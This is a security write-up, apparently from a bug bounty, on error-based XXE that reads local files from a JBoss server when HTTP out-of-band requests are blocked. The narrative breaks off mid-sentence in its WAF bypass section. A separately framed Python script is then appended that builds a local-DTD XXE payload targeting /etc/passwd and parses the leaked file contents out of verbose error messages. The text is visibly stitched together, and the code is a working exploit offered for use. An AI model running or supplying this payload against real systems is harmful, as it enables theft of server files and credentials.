Spilling Local Files via XXE When HTTP OOB Fails
Hello everyone. Today I will be sharing a very interesting XXE exploitation technique, which as far as I know was first described at https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ and later researched further by the GoSecure team. The scenario: reading local files from the server when HTTP out-of-band requests were blocked and only DNS requests reached me, but the application returned verbose XML parsing error messages.

Discovery

While browsing through the application in Burp I realized the app used a REST API over JSON at every endpoint. Next, I tried changing the Content-Type to application/xml and replayed one of the requests. The application threw a verbose error that revealed the application server (JBoss) along with other error details, and it was clear the application was expecting to parse XML but had been given JSON. So, I converted the JSON body to the corresponding XML.

WAF Bypass

The server was behind a cloud-based WAF which g...
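The two moving parts described above, converting the JSON body to XML and wrapping it in the local-DTD error-based XXE payload from the linked write-up, as an added example that is not the author's code. It assumes the DTD path and overridden parameter entity from mohemiv.com (/usr/share/yelp/dtd/docbookx.dtd, ISOamso), a root element named "request", and a parser whose error message echoes the failed file URI; all of those are assumptions and must be adjusted to the target. The sample request body and error text are constructed.

```python
"""Error-based XXE via a local DTD when no HTTP out-of-band channel exists.

Added example, not the author's code. Assumptions: the target parses the
converted JSON as XML, the local DTD path and the overridden parameter
entity follow the mohemiv.com write-up (/usr/share/yelp/dtd/docbookx.dtd,
ISOamso), the root element is named "request", and the parser echoes the
failed file URI in its error message.
"""
import json
from xml.sax.saxutils import escape


def json_to_xml(value, tag):
    """Recursively render a decoded JSON value as an XML element string.
    Lists repeat the parent tag, null becomes an empty element, and text
    is escaped so user-controlled values cannot break the document."""
    if isinstance(value, dict):
        inner = "".join(json_to_xml(v, k) for k, v in value.items())
        return f"<{tag}>{inner}</{tag}>"
    if isinstance(value, list):
        return "".join(json_to_xml(v, tag) for v in value)
    if value is None:
        return f"<{tag}/>"
    if isinstance(value, bool):
        value = "true" if value else "false"
    return f"<{tag}>{escape(str(value))}</{tag}>"


def local_dtd_doctype(root_tag, target_file,
                      dtd_path="/usr/share/yelp/dtd/docbookx.dtd",
                      entity="ISOamso"):
    """DOCTYPE that loads a DTD already on the server's disk and redefines
    one of its parameter entities (assumed path and entity name). The
    redefinition declares the target file as a parameter entity, builds a
    second entity whose system ID embeds the file contents, and
    dereferences it, so the parser fails to open
    "file:///nonexistent/<file contents>" and leaks them in the error.
    Only file:// URIs are used, so no outbound traffic is needed."""
    return (
        f'<!DOCTYPE {root_tag} [\n'
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        f"<!ENTITY % {entity} '\n"
        f'<!ENTITY &#x25; file SYSTEM "file://{target_file}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        "&#x27;file:///nonexistent/&#x25;file;&#x27;>\">\n"
        '&#x25;eval;\n'
        '&#x25;error;\n'
        "'>\n"
        '%local_dtd;\n'
        ']>\n'
    )


def build_payload(json_body, target_file="/etc/passwd", root_tag="request"):
    """Convert the JSON request body to XML and prepend the DOCTYPE so the
    replayed request still matches what the endpoint expects."""
    body = json_to_xml(json.loads(json_body), root_tag)
    return '<?xml version="1.0"?>\n' + local_dtd_doctype(root_tag, target_file) + body


def extract_leaked_file(error_text, marker="/nonexistent/"):
    """Recover the file body from a verbose parser error. Assumes the error
    echoes the failed path, i.e. the marker directory followed by the file
    contents; the trailing wording differs per parser and is an assumption."""
    idx = error_text.find(marker)
    if idx == -1:
        return None
    leaked = error_text[idx + len(marker):]
    for terminator in (" (No such file or directory)", "'", '"'):
        cut = leaked.find(terminator)
        if cut != -1:
            leaked = leaked[:cut]
    return leaked


if __name__ == "__main__":
    # Constructed sample request body and a constructed JBoss-style error.
    sample_json = '{"username": "alice", "roles": ["user", "admin"], "mfa": null}'
    print(build_payload(sample_json))
    sample_error = (
        "javax.xml.stream.XMLStreamException: java.io.FileNotFoundException: "
        "/nonexistent/root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin (No such file or directory)"
    )
    print(extract_leaked_file(sample_error))
```

Because the DOCTYPE only references file:// URIs, the whole chain works with outbound HTTP blocked; the leak channel is the verbose error itself, which is why the technique needs the server to echo parser errors. Which local DTD exists, and which of its parameter entities can be overridden, is the part that has to be enumerated per target.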